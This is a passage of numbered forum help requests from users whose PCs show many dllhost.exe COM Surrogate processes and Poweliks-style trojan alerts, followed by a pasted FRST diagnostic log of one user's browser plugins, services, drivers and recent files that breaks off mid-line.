  7. Seeing a lot of dllhost.exe *32 COM Surrogate on my processes using a decent amount of memory and using bandwidth. Need help fixing, antivirus is saying everything is good
  8. I have a virus of some kind on my computer. I'm getting popups stating that malicious websites are being blocked. It says the process is C:\windows\syswow64\dllhost.exe. I have read through some of this forum. I tried to download the Farbar software but it says my security settings won't allow me to. Thanks for any help.
  9. For a couple of weeks, one of our users has had non-stop ESET popups informing him that "an address has been blocked." As this is happening, many dllhost.exe *32 COM Surrogate processes build up in the task manager. This problem is only present on his user account on the computer. I deleted his user profile and had him log in again. The problem cleared for almost a week before it came back. Any help ridding this computer of it would be greatly appreciated. I've run a FRST scan and attached the logs. FRST.txt Addition.txt
  10. I really need some help. After my nephew visited and downloaded some games and other things onto my computer so he could play while he was visiting, I started having problems with a slow computer. My Norton 360 kept saying it was blocking a Poweliks Trojan. I show many processes with dllhost.exe and kqikghfb.exe. If they are deleted/ended, they simply come back. I downloaded Malwarebytes, scanned, and quarantined all that showed up as needing fixed. Now, Malwarebytes is constantly blocking attacks and/or intrusions from the following: honeymods.com dllhost.exe appsruors.com Trojan.Gen.2 ffsee.com Attached are my FRST and Addition files. I would really appreciate some help! Thank you! Addition.txt FRST.txt
  11. Sorry to be a repeat of this issue, but it seems everyone is a little different. I recently was infected with a virus appearing to be called "SecurityCenter". This wasn't my first run-in with malware so I did what I know to remove it manually (av clearly failing in the first place). I was able to remove all keys and processes and nothing suspicious runs now with the exception of this dllhost issue. It only starts when Internet Explorer runs and results in many instances of the process running simultaneously, consuming resources. The processes can be stopped and everything runs normally for a while. In addition, Internet Explorer protected mode repeatedly gets turned off automatically and the home page reset to about:blank. I have completely uninstalled IE and reinstalled with no resolution. I am running Vista x64 premium.
  12. Hello. My computer seems to have some sort of virus. I have been working profusely the past few days in an effort to fix my PC. I seem to have removed most threats, however as of right now I am receiving alerts from Malwarebytes Anti-Malware about websites and IPs (specifically fff5ee.com). Along with this, there are numerous instances of the dllhost.exe *32 process that continually show up after I end them. I ran lots of anti-malware programs, but to no avail. I have also run combofix and FRST, but nothing seems to be fixed. I have attached the logs below. All assistance is much appreciated! Addition.txt FRST.txt ComboFix.txt
  13. Help! Last evening (10-27-14), Malwarebytes started blocking numerous outgoing IP addresses while I was browsing the internet. I added them to the 'Excluded List', but my browser is S L O W. Checking my Task Manager, there are about 20 instances of DLLHOST.EXE COM Surrogate running and eating up my CPU capacity. After a little checking around, I downloaded the FARBAR RECOVERY SCAN TOOL and ran it. I tried to cut-and-paste the files in this forum, but they will not paste. I am attaching the following files if they can be used: FRST.txt Addition.txt Thanks to whoever could help with removing this annoying creature from my computer. Addition.txt FRST.txt
  14. I'm having the same problem as so many others with com surrogate using memory. I've done all I know to do for this but still no luck. Please help. Below are the results of the frst and addition files. I also installed the latest version of malwarebytes, set the settings as mentioned in other posts and ran. It found two problems in the registry so I added those to the fix list, ran the fix and then ran the program again. It doesn't find anything now.
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) Toolbar: HKCU - No Name - {8FF5E180-ABDE-46EB-B09E-D2AAB95CABE3} - No File Toolbar: HKCU - No Name - {EE2AC4E5-B0B0-4EC6-88A9-BCA1A32AB107} - No File DPF: HKLM-x32 {74F4F118-91E6-4AFC-B8D2-04066781F239} https://www.member-data.com/rdc/EZTwainX.cab Handler: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - No File Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: http\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: https\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) ShellExecuteHooks: Directory Opus Shell Execute Hook - {3CF9ECE0-1A9F-11D2-8C73-00C06C2005DE} - C:\Program Files\GPSoftware\Directory Opus\dopuslib.dll [1573504 2014-09-16] (GP Software) ShellExecuteHooks-x32: Directory Opus Shell Execute Hook - 
{EE761688-C137-4b04-8FAB-3C9CDF0886F0} - C:\Program Files\GPSoftware\Directory Opus\dopuslib32.dll [343640 2014-09-16] (GP Software) Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62 FireFox: ======== FF ProfilePath: C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417 FF Homepage: localsites/ FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_189.dll () FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.) FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_189.dll () FF Plugin-x32: @checkpoint.com/FFApi -> C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker\bin\npFFApi.dll No File FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google) FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.) FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @nullsoft.com/winampDetector;version=1 -> C:\Program Files (x86)\Winamp Detect\npwachk.dll (Nullsoft, Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) 
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Jack\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Jack\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.) FF Extension: SeoQuake - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{317B5128-0B0B-49b2-B2DB-1E7560E16C74} [2014-09-05] FF Extension: ColorZilla - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{6AC85730-7D0F-4de0-B3FA-21142DD85326} [2013-08-10] FF Extension: ReminderFox - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{ada4b710-8346-4b82-8199-5de2b400a6ae} [2014-04-21] FF Extension: Cookies Manager+ - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{bb6bc1bb-f824-4702-90cd-35e2fb24f25d} [2013-11-18] FF Extension: Firebug - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\firebug@software.joehewitt.com.xpi [2013-09-06] FF Extension: YouTube Enhancer Plus - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\firefoxaddon@youtubeenhancer.com.xpi [2013-08-23] FF Extension: Foxy SEO Tool - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\foxyseotool@foxyseotool.com.xpi [2013-10-16] FF Extension: Leading-SEO - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\jid0-nWM1zRUDcqM8sPZ4tmz40Nce7jE@jetpack.xpi [2013-10-16] FF Extension: Flash OnOff - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\jid0-XXocAsQYPfKHSY8ebTi0VcX8eNQ@jetpack.xpi 
[2013-08-04] FF Extension: User Agent Overrider - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\useragentoverrider@qixinglu.com.xpi [2013-10-16] FF Extension: Remove Cookies for Site - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{06997db0-c027-4d5f-bd37-b0d9230226ea}.xpi [2014-03-16] FF Extension: MeasureIt - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{75CEEE46-9B64-46f8-94BF-54012DE155F0}.xpi [2013-10-30] FF Extension: SEO and Website Analysis - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{8BCA0E8A-E57B-425b-A05B-CD3868EB577E}.xpi [2013-10-16] FF Extension: Show my Password - C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\l7tarqgo.default-1374718651417\Extensions\{cd617372-6743-4ee4-bac4-fbf60f35719e}.xpi [2013-10-16] FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF FF Extension: avast! 
Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2013-04-18] FF HKLM-x32\...\Firefox\Extensions: [fiddlerhook@fiddler2.com] - C:\Program Files (x86)\Fiddler2\FiddlerHook FF Extension: FiddlerHook - C:\Program Files (x86)\Fiddler2\FiddlerHook [2013-02-27] FF HKLM-x32\...\Firefox\Extensions: [{FFB96CC1-7EB3-449D-B827-DB661701C6BB}] - C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker FF HKLM-x32\...\Firefox\Extensions: [RAWThumbnailViewer@arcsoft.com.cn] - C:\Program Files (x86)\ArcSoft\RAW Thumbnail Viewer\FireFox Extension FF Extension: RAW Thumbnail Viewer - C:\Program Files (x86)\ArcSoft\RAW Thumbnail Viewer\FireFox Extension [2014-03-04] FF HKLM-x32\...\Firefox\Extensions: [{B728AB94-9BC7-49b7-B76A-422BB31B2FD0}] - C:\Program Files (x86)\ArcSoft\Video Downloader\Plugin_FireFox FF Extension: ArcSoft Video Downloader Extension - C:\Program Files (x86)\ArcSoft\Video Downloader\Plugin_FireFox [2014-03-04] Chrome: ======= CHR HomePage: Default -> hxxp://www.google.com/ CHR StartupUrls: Default -> "hxxp://www.google.com/" CHR Plugin: (Remoting Viewer) - internal-remoting-viewer CHR Plugin: (Native Client) - C:\Users\Jack\AppData\Local\Google\Chrome\Application\38.0.2125.104\ppGoogleNaClPluginChrome.dll No File CHR Plugin: (Chrome PDF Viewer) - C:\Users\Jack\AppData\Local\Google\Chrome\Application\38.0.2125.104\pdf.dll () CHR Plugin: (Shockwave Flash) - C:\Users\Jack\AppData\Local\Google\Chrome\Application\38.0.2125.104\gcswf32.dll No File CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_2_202_235.dll No File CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll No File CHR Plugin: (Java Deployment Toolkit 6.0.290.11) - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll No File CHR Plugin: (Java Platform SE 6 U29) - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll No File CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google 
Earth\plugin\npgeplugin.dll (Google) CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.111\npGoogleUpdate3.dll No File CHR Profile: C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-21] CHR Extension: (SEOrch - OnPage SEO Tool) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\dofplnfijbongplmhcpoobljlfjeaank [2013-08-06] CHR Extension: (SEO SERP Workbench) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\ehbgolklgacemnfnmkkpgekngaaggjjl [2013-07-24] CHR Extension: (avast! Online Security) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2013-09-23] CHR Extension: (Seo Serp Manager) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\jncpgpllflmbaaofhdmfamncdipmedjo [2013-09-03] CHR Extension: (Tag Assistant (by Google)) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\kejbdjndbnbjgmefkgdddjlbokphdefk [2013-07-21] CHR Extension: (WebRank SEO) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkhilblbmkdnapffblmecglknalglfji [2013-07-22] CHR Extension: (Google Wallet) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22] CHR StartMenuInternet: Google Chrome - C:\Users\Jack\AppData\Local\Google\Chrome\Application\chrome.exe ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) 
R2 ABBYY.Licensing.FineReader.Sprint.9.0; C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [759048 2009-05-14] (ABBYY) R2 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.) S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [68096 2011-05-01] () [File not signed] R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [46808 2013-08-30] (AVAST Software) R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [137960 2013-08-30] (AVAST Software) R2 Diskeeper; C:\Program Files\Condusiv Technologies\Diskeeper\DkService.exe [2721656 2012-07-27] (Condusiv Technologies) R2 MSSQL$UPSWSDBSERVER; C:\UPS\WSTD\MSSQL.1\MSSQL\Binn\sqlservr.exe [29263712 2008-11-24] (Microsoft Corporation) R2 ppped; C:\Program Files (x86)\CyberPower PowerPanel Personal Edition\ppped.exe [868352 2009-05-27] (Cyber Power Systems, Inc.) [File not signed] R2 vsmon; C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe [3592120 2014-04-25] (Check Point Software Technologies Ltd.) R2 wampapache; c:\wamp\bin\apache\apache2.0.63\bin\Apache.exe [20541 2008-01-17] (Apache Software Foundation) [File not signed] R3 wampmysqld; c:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe [8133120 2010-12-31] () [File not signed] S4 ZAPrivacyService; C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZAPrivacyService.exe [92176 2014-04-09] (Check Point Software Technologies, Ltd.) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) 
R2 aswFsBlk; C:\Windows\System32\Drivers\aswFsBlk.sys [33400 2013-08-30] (AVAST Software) R1 aswFW; C:\Windows\System32\Drivers\aswFW.sys [131232 2013-08-30] (AVAST Software) R0 aswKbd; C:\Windows\System32\Drivers\aswKbd.sys [22600 2013-08-30] (AVAST Software) R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [80816 2013-08-30] (AVAST Software) R0 aswNdis; C:\Windows\System32\DRIVERS\aswNdis.sys [12368 2013-03-06] (ALWIL Software) R0 aswNdis2; C:\Windows\System32\Drivers\aswNdis2.sys [270824 2013-08-30] (AVAST Software) R1 aswRdr; C:\Windows\System32\Drivers\aswrdr2.sys [72016 2013-08-30] (AVAST Software) R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65336 2013-08-30] () R1 aswSnx; C:\Windows\System32\Drivers\aswSnx.sys [1030952 2013-08-30] (AVAST Software) R1 aswSP; C:\Windows\System32\Drivers\aswSP.sys [378944 2013-08-30] (AVAST Software) R1 aswTdi; C:\Windows\System32\Drivers\aswTdi.sys [64288 2013-08-30] (AVAST Software) R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [204880 2013-08-30] () R0 DKDFM; C:\Windows\System32\drivers\DKDFM.sys [40752 2012-04-05] (Condusiv Technologies) R3 DKRtWrt; C:\Windows\System32\DRIVERS\DKRtWrt.sys [52048 2012-06-18] (Condusiv Technologies) R0 DKTLFSMF; C:\Windows\System32\drivers\DKTLFSMF.sys [106832 2012-07-09] (Condusiv Technologies) S3 hcw85cir; C:\Windows\system32\drivers\hcw85cir3.sys [32768 2009-09-11] (Hauppauge Computer Works, Inc.) 
R3 mio; C:\Windows\System32\DRIVERS\mio.sys [14928 2010-10-13] (Dell/Alienware) S4 Mpsnt0; No ImagePath R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2009-07-29] (Silicon Image, Inc) R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2009-07-29] (Silicon Image, Inc) R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2009-07-29] (Silicon Image, Inc) R0 tib; C:\Windows\System32\DRIVERS\tib.sys [1120032 2013-04-13] (Acronis International GmbH) R0 tib_mounter; C:\Windows\System32\DRIVERS\tib_mounter.sys [183224 2013-04-13] (Acronis) U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [37624 2014-10-26] () R0 vidsflt; C:\Windows\System32\DRIVERS\vidsflt.sys [117024 2013-04-13] (Acronis International GmbH) R1 Vsdatant; C:\Windows\System32\DRIVERS\vsdatant.sys [450968 2014-04-24] (Check Point Software Technologies Ltd.) S3 PCDSRVC{0FF99CEB-15C9CE9E-06020200}_0; \??\c:\program files\alienautopsy\pcdsrvc_x64.pkms [X] U3 wampapache64; No ImagePath ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 
C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00009728 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00009728 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00005632 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00005632 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-user32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll 2014-10-25 08:46 - 
2014-10-25 08:46 - 00002560 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-normaliz-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00002560 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll 2014-10-25 08:45 - 2014-10-25 08:50 - 00008540 _____ () C:\Windows\IE10_main.log 2014-10-24 20:30 - 2014-10-26 21:42 - 00000672 _____ () C:\Windows\setupact.log 2014-10-24 20:30 - 2014-10-24 20:30 - 00000000 _____ () C:\Windows\setuperr.log 2014-10-23 10:47 - 2014-10-23 10:47 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieUserList 2014-10-23 10:47 - 2014-10-23 10:47 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieSiteList 2014-10-23 10:31 - 2014-09-26 18:42 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll 2014-10-23 10:31 - 2014-09-26 18:36 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe 2014-10-23 10:31 - 2014-09-26 18:36 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe 2014-10-23 10:31 - 2014-09-26 18:35 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe 2014-10-23 10:29 - 2014-10-23 10:31 - 00004195 _____ () C:\Windows\SysWOW64\jupdate-1.7.0_71-b14.log 2014-10-23 09:49 - 2014-10-26 22:38 - 00000000 ____D () C:\FRST 2014-10-21 11:20 - 2013-10-14 18:00 - 00028368 _____ (Microsoft Corporation) C:\Windows\system32\IEUDINIT.EXE 2014-10-15 13:37 - 2014-10-15 13:37 - 00002910 _____ () C:\Users\Jack\AppData\Local\recently-used.xbel 2014-10-14 22:08 - 2014-09-28 20:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-10-14 22:08 - 2014-09-12 21:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll 2014-10-14 22:08 - 2014-09-12 21:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll 2014-10-14 22:08 - 2014-09-04 01:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll 2014-10-14 22:08 - 2014-09-04 01:04 - 00372736 _____ 
(Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll 2014-10-14 22:08 - 2014-08-28 22:07 - 05780480 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll 2014-10-14 22:08 - 2014-08-28 22:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll 2014-10-14 22:08 - 2014-08-28 22:07 - 00322560 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll 2014-10-14 22:08 - 2014-08-28 22:07 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll 2014-10-14 22:08 - 2014-08-28 22:06 - 01125888 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe 2014-10-14 22:08 - 2014-08-28 21:44 - 04922368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll 2014-10-14 22:08 - 2014-08-28 21:44 - 01050112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe 2014-10-14 22:08 - 2014-08-28 21:44 - 00269312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll 2014-10-14 22:08 - 2014-08-28 21:44 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll 2014-10-14 22:08 - 2014-07-16 22:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll 2014-10-14 22:08 - 2014-07-16 22:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe 2014-10-14 22:08 - 2014-07-16 22:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll 2014-10-14 22:08 - 2014-07-16 22:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll 2014-10-14 22:08 - 2014-07-16 22:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2014-10-14 22:08 - 2014-07-16 22:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2014-10-14 22:08 - 2014-07-16 21:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll 2014-10-14 22:08 - 2014-07-16 21:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2014-10-14 22:08 - 2014-07-16 21:39 - 00017408 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\credssp.dll 2014-10-14 22:08 - 2014-07-16 21:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys 2014-10-14 22:08 - 2014-07-16 21:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys 2014-10-14 22:08 - 2014-06-18 18:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll 2014-10-14 22:08 - 2014-06-18 18:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll 2014-10-14 22:08 - 2014-06-18 18:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll 2014-10-14 22:08 - 2014-06-18 18:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll 2014-10-14 22:08 - 2014-06-18 18:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll 2014-10-14 22:08 - 2014-06-18 18:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll 2014-10-14 22:08 - 2014-05-30 04:08 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2014-10-14 22:08 - 2014-05-30 04:08 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2014-10-14 22:08 - 2014-05-30 04:08 - 00307200 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll 2014-10-14 22:08 - 2014-05-30 04:08 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2014-10-14 22:08 - 2014-05-30 03:52 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2014-10-14 22:08 - 2014-05-30 03:52 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2014-10-14 22:08 - 2014-05-30 03:52 - 00220160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll 2014-10-14 22:08 - 2014-05-30 03:52 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll 2014-10-02 19:35 - 2014-10-02 19:35 - 00141237 _____ () C:\Users\Jack\Downloads\oscom_paypal_pro_payflow-3.1.zip ==================== One Month Modified Files and Folders ======= (If an entry is included in 
